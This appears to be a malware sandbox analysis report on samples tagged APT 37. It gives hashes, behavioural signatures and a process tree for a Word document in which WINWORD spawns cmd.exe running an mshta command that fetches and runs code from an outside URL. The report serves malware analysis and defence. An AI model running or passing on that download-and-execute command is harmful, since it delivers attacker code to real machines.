Overview
overview
10Static
static
8APT 37 Pre...˜¸.rar
windows7-x64
3APT 37 Pre...˜¸.rar
windows10-2004-x64
3KN0408_045...˜¸.chm
windows7-x64
1KN0408_045...˜¸.chm
windows10-2004-x64
1KN0408_045...호.js
windows7-x64
1KN0408_045...호.js
windows10-2004-x64
1APT 37 Pre...„ .rar
windows7-x64
3APT 37 Pre...„ .rar
windows10-2004-x64
3LGìœ í”ŒëŸ...„ .chm
windows7-x64
1LGìœ í”ŒëŸ...„ .chm
windows10-2004-x64
1LGìœ í”ŒëŸ... .html
windows7-x64
1LGìœ í”ŒëŸ... .html
windows10-2004-x64
1APT 37 Pre...„ .rar
windows7-x64
3APT 37 Pre...„ .rar
windows10-2004-x64
3APT 37 Pre...02.rar
windows7-x64
3APT 37 Pre...02.rar
windows10-2004-x64
3APT 37 Pre...1).rar
windows7-x64
3APT 37 Pre...1).rar
windows10-2004-x64
3APT 37 Pre...ge.rar
windows7-x64
3APT 37 Pre...ge.rar
windows10-2004-x64
3APT 37 Pre...¦.doc
windows7-x64
10APT 37 Pre...¦.doc
windows10-2004-x64
10APT 37 Pre...1).rar
windows7-x64
3APT 37 Pre...1).rar
windows10-2004-x64
3APT 37 Pre...2).rar
windows7-x64
3APT 37 Pre...2).rar
windows10-2004-x64
3APT 37 Pre...ce.rar
windows7-x64
3APT 37 Pre...ce.rar
windows10-2004-x64
3APT 37 Pre...1).rar
windows7-x64
3APT 37 Pre...1).rar
windows10-2004-x64
3APT 37 Pre...ne.rar
windows7-x64
3APT 37 Pre...ne.rar
windows10-2004-x64
3Analysis
-
max time kernel
144s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
21-03-2023 23:28
Behavioral task
behavioral1
Sample
APT 37 Previous Commits 3/KN0408_045 ì •ì˜í˜¸.rar
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
APT 37 Previous Commits 3/KN0408_045 ì •ì˜í˜¸.rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
KN0408_045 ì •ì˜í˜¸/KN0408_045 ì •ì˜í˜¸.chm
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
KN0408_045 ì •ì˜í˜¸/KN0408_045 ì •ì˜í˜¸.chm
Resource
win10v2004-20230221-en
Behavioral task
behavioral5
Sample
KN0408_045 ì •ì˜í˜¸/KN0408_045 ì •ì˜í˜¸.js
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
KN0408_045 ì •ì˜í˜¸/KN0408_045 ì •ì˜í˜¸.js
Resource
win10v2004-20230220-en
Behavioral task
behavioral7
Sample
APT 37 Previous Commits 3/LGìœ í”ŒëŸ¬ìŠ¤_ì´ë™í†µì‹ _202207_ì´_ì„ .rar
Resource
win7-20230220-en
Behavioral task
behavioral8
Sample
APT 37 Previous Commits 3/LGìœ í”ŒëŸ¬ìŠ¤_ì´ë™í†µì‹ _202207_ì´_ì„ .rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral9
Sample
LGìœ í”ŒëŸ¬ìŠ¤_ì´ë™í†µì‹ _202207_ì´_ì„ .chm
Resource
win7-20230220-en
Behavioral task
behavioral10
Sample
LGìœ í”ŒëŸ¬ìŠ¤_ì´ë™í†µì‹ _202207_ì´_ì„ .chm
Resource
win10v2004-20230220-en
Behavioral task
behavioral11
Sample
LGìœ í”ŒëŸ¬ìŠ¤_ì´ë™í†µì‹ _202207_ì´_ì„ .html
Resource
win7-20230220-en
Behavioral task
behavioral12
Sample
LGìœ í”ŒëŸ¬ìŠ¤_ì´ë™í†µì‹ _202207_ì´_ì„ .html
Resource
win10v2004-20230221-en
Behavioral task
behavioral13
Sample
APT 37 Previous Commits 3/LGìœ í”ŒëŸ¬ìŠ¤_ì´ë™í†µì‹ _202208_ì´_ì„ .rar
Resource
win7-20230220-en
Behavioral task
behavioral14
Sample
APT 37 Previous Commits 3/LGìœ í”ŒëŸ¬ìŠ¤_ì´ë™í†µì‹ _202208_ì´_ì„ .rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral15
Sample
APT 37 Previous Commits 3/MAIL_20230125151802.rar
Resource
win7-20230220-en
Behavioral task
behavioral16
Sample
APT 37 Previous Commits 3/MAIL_20230125151802.rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral17
Sample
APT 37 Previous Commits 3/Message (1).rar
Resource
win7-20230220-en
Behavioral task
behavioral18
Sample
APT 37 Previous Commits 3/Message (1).rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral19
Sample
APT 37 Previous Commits 3/Message.rar
Resource
win7-20230220-en
Behavioral task
behavioral20
Sample
APT 37 Previous Commits 3/Message.rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral21
Sample
APT 37 Previous Commits 3/NEW(주)ì— ì—스ë¶ìŠ¤ 사업ìžë“±ë¡ì¦.doc
Resource
win7-20230220-en
Behavioral task
behavioral22
Sample
APT 37 Previous Commits 3/NEW(주)ì— ì—스ë¶ìŠ¤ 사업ìžë“±ë¡ì¦.doc
Resource
win10v2004-20230220-en
Behavioral task
behavioral23
Sample
APT 37 Previous Commits 3/NTS_eTaxInvoice (1).rar
Resource
win7-20230220-en
Behavioral task
behavioral24
Sample
APT 37 Previous Commits 3/NTS_eTaxInvoice (1).rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral25
Sample
APT 37 Previous Commits 3/NTS_eTaxInvoice (2).rar
Resource
win7-20230220-en
Behavioral task
behavioral26
Sample
APT 37 Previous Commits 3/NTS_eTaxInvoice (2).rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral27
Sample
APT 37 Previous Commits 3/NTS_eTaxInvoice.rar
Resource
win7-20230220-en
Behavioral task
behavioral28
Sample
APT 37 Previous Commits 3/NTS_eTaxInvoice.rar
Resource
win10v2004-20230220-en
Behavioral task
behavioral29
Sample
APT 37 Previous Commits 3/News about Foreign affairs, The High North and Ukraine (1).rar
Resource
win7-20230220-en
Behavioral task
behavioral30
Sample
APT 37 Previous Commits 3/News about Foreign affairs, The High North and Ukraine (1).rar
Resource
win10v2004-20230221-en
Behavioral task
behavioral31
Sample
APT 37 Previous Commits 3/News about Foreign affairs, The High North and Ukraine.rar
Resource
win7-20230220-en
Behavioral task
behavioral32
Sample
APT 37 Previous Commits 3/News about Foreign affairs, The High North and Ukraine.rar
Resource
win10v2004-20230220-en
General
-
Target
APT 37 Previous Commits 3/NEW(주)ì— ì—스ë¶ìŠ¤ 사업ìžë“±ë¡ì¦.doc
-
Size
768KB
-
MD5
e89725778e52fa571a229cc6e65acd8d
-
SHA1
11e14587aa9e4c3039a214b21d63a616a32aa01b
-
SHA256
0474bb7c100c5187c838e5cf14969fdaf04ed541e373aa3b1ad607dd2b420a1b
-
SHA512
cf070d7c2cd2f2006b55da592f4db8758ec94d3608d91bebef3ba958ac34bbabffa7dc2f17f52a77349ea922e6efbd22fddb74b6aaadd37593be2f28c3bcbb82
-
SSDEEP
12288:5eNs9H0fEccVGYEOH1uW7vyaQaHbB/g+1ev/6d6htoWHdttOOJVYqTz:YeRcBc1u6tHHbm/QUoW9XOO8
Malware Config
Extracted
http://attiferstudio.com/install.bak/sony/10.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1680 1560 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid process 29 1484 mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 1560 WINWORD.EXE 1560 WINWORD.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 1560 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
WINWORD.EXEpid process 1560 WINWORD.EXE 1560 WINWORD.EXE 1560 WINWORD.EXE 1560 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid process target process PID 1560 wrote to memory of 1680 1560 WINWORD.EXE cmd.exe PID 1560 wrote to memory of 1680 1560 WINWORD.EXE cmd.exe PID 1680 wrote to memory of 1484 1680 cmd.exe mshta.exe PID 1680 wrote to memory of 1484 1680 cmd.exe mshta.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\APT 37 Previous Commits 3\NEW(주)ì— ì—스ë¶ìŠ¤ 사업ìžë“±ë¡ì¦.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mshta http://attiferstudio.com/install.bak/sony/10.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta http://attiferstudio.com/install.bak/sony/10.html3⤵
- Blocklisted process makes network request
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1560-133-0x00007FFBB0E10000-0x00007FFBB0E20000-memory.dmpFilesize
64KB
-
memory/1560-135-0x00007FFBB0E10000-0x00007FFBB0E20000-memory.dmpFilesize
64KB
-
memory/1560-134-0x00007FFBB0E10000-0x00007FFBB0E20000-memory.dmpFilesize
64KB
-
memory/1560-136-0x00007FFBB0E10000-0x00007FFBB0E20000-memory.dmpFilesize
64KB
-
memory/1560-137-0x00007FFBB0E10000-0x00007FFBB0E20000-memory.dmpFilesize
64KB
-
memory/1560-138-0x00007FFBAEAE0000-0x00007FFBAEAF0000-memory.dmpFilesize
64KB
-
memory/1560-139-0x00007FFBAEAE0000-0x00007FFBAEAF0000-memory.dmpFilesize
64KB
-
memory/1560-170-0x00007FFBB0E10000-0x00007FFBB0E20000-memory.dmpFilesize
64KB
-
memory/1560-169-0x00007FFBB0E10000-0x00007FFBB0E20000-memory.dmpFilesize
64KB
-
memory/1560-172-0x00007FFBB0E10000-0x00007FFBB0E20000-memory.dmpFilesize
64KB
-
memory/1560-171-0x00007FFBB0E10000-0x00007FFBB0E20000-memory.dmpFilesize
64KB